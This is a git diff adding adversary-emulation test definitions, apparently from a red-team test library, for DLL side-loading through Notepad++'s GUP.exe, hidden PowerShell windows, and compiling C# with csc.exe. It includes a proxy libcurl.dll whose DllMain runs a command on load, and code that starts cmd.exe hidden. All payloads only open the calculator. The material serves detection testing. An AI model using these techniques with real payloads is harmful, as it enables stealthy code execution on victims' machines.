diff --git a/atomics/T1073/T1073.yaml b/atomics/T1073/T1073.yaml
new file mode 100644
index 00000000..ec92f37b
--- /dev/null
+++ b/atomics/T1073/T1073.yaml
@@ -0,0 +1,25 @@
+---
+attack_technique: T1073
+display_name: DLL Side-Loading
+
+atomic_tests:
+- name: DLL Side-Loading using the Notepad++ GUP.exe binary
+  description: |
+    GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    process_name:
+      description: Name of the created process
+      type: string
+      default: calculator.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      $PathToAtomicsFolder\T1073\bin\GUP.exe
+    cleanup_command: | 
+      taskkill /F /IM #{process_name}
\ No newline at end of file
diff --git a/atomics/T1073/bin/GUP.exe b/atomics/T1073/bin/GUP.exe
new file mode 100644
index 00000000..ad6cf0d5
Binary files /dev/null and b/atomics/T1073/bin/GUP.exe differ
diff --git a/atomics/T1073/bin/libcurl.dll b/atomics/T1073/bin/libcurl.dll
new file mode 100644
index 00000000..b608b676
Binary files /dev/null and b/atomics/T1073/bin/libcurl.dll differ
diff --git a/atomics/T1073/src/libcurl.c b/atomics/T1073/src/libcurl.c
new file mode 100644
index 00000000..f3b41d74
--- /dev/null
+++ b/atomics/T1073/src/libcurl.c
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <windows.h>
+
+extern __declspec(dllexport) void curl_easy_setopt(void){ return; }
+extern __declspec(dllexport) void curl_easy_cleanup(void) { return; }
+extern __declspec(dllexport) void curl_easy_duphandle(void) { return; }
+extern __declspec(dllexport) void curl_easy_escape(void) { return; }
+extern __declspec(dllexport) void curl_easy_getinfo(void) { return; }
+extern __declspec(dllexport) void curl_easy_init(void) { return; }
+extern __declspec(dllexport) void curl_easy_pause(void) { return; }
+extern __declspec(dllexport) void curl_easy_perform(void) { return; }
+extern __declspec(dllexport) void curl_easy_recv(void) { return; }
+extern __declspec(dllexport) void curl_easy_reset(void) { return; }
+extern __declspec(dllexport) void curl_easy_send(void) { return; }
+extern __declspec(dllexport) void curl_easy_strerror(void) { return; }
+extern __declspec(dllexport) void curl_easy_unescape(void) { return; }
+
+void DllUnregisterServer(void)
+{
+	system("calc.exe");
+	return;
+}
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	{
+		DllUnregisterServer();
+		break;
+	}
+	case DLL_THREAD_ATTACH:
+		break;
+	case DLL_THREAD_DETACH:
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
diff --git a/atomics/T1143/T1143.yaml b/atomics/T1143/T1143.yaml
new file mode 100644
index 00000000..dc9ae104
--- /dev/null
+++ b/atomics/T1143/T1143.yaml
@@ -0,0 +1,29 @@
+---
+attack_technique: T1143
+display_name: Hidden Window
+
+atomic_tests:
+- name: Hidden Window
+  description: |
+    Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    powershell_command:
+      description: Command to launch calc.exe from a hidden PowerShell Window
+      type: String
+      default: powershell.exe -WindowStyle hidden calc.exe
+    powershell_process_name:
+      description: Name of the created process
+      type: string
+      default: calculator
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: | 
+      Start-Process #{powershell_command}
+    cleanup_command: | 
+      Stop-Process -Name "#{powershell_process_name}"
\ No newline at end of file
diff --git a/atomics/T1500/T1500.yaml b/atomics/T1500/T1500.yaml
new file mode 100644
index 00000000..a1727e4c
--- /dev/null
+++ b/atomics/T1500/T1500.yaml
@@ -0,0 +1,29 @@
+---
+attack_technique: T1500
+display_name: Compile After Delivery
+
+atomic_tests:
+- name: Compile After Delivery using csc.exe
+  description: |
+    Compile C# code using csc.exe binary used by .NET 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    input_file:
+      description: C# code that launches calc.exe from a hidden cmd.exe Window
+      type: file
+      default: $PathToAtomicsFolder\T1500\src\calc.cs
+    output_file:
+      description: Output compiled binary
+      type: file
+      default: C:\Windows\Temp\T1500.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
+    cleanup_command: | 
+      del #{output_file}
\ No newline at end of file
diff --git a/atomics/T1500/src/calc.cs b/atomics/T1500/src/calc.cs
new file mode 100644
index 00000000..d417148f
--- /dev/null
+++ b/atomics/T1500/src/calc.cs
@@ -0,0 +1,18 @@
+using System.Diagnostics;
+
+namespace Console
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            var proc = new ProcessStartInfo();
+            proc.UseShellExecute = true;
+            proc.WorkingDirectory = @"C:\Windows\System32";
+            proc.FileName = @"cmd.exe";
+            proc.Arguments = "/c calc.exe";
+            proc.WindowStyle = ProcessWindowStyle.Hidden;
+            Process.Start(proc);
+        }
+    }
+}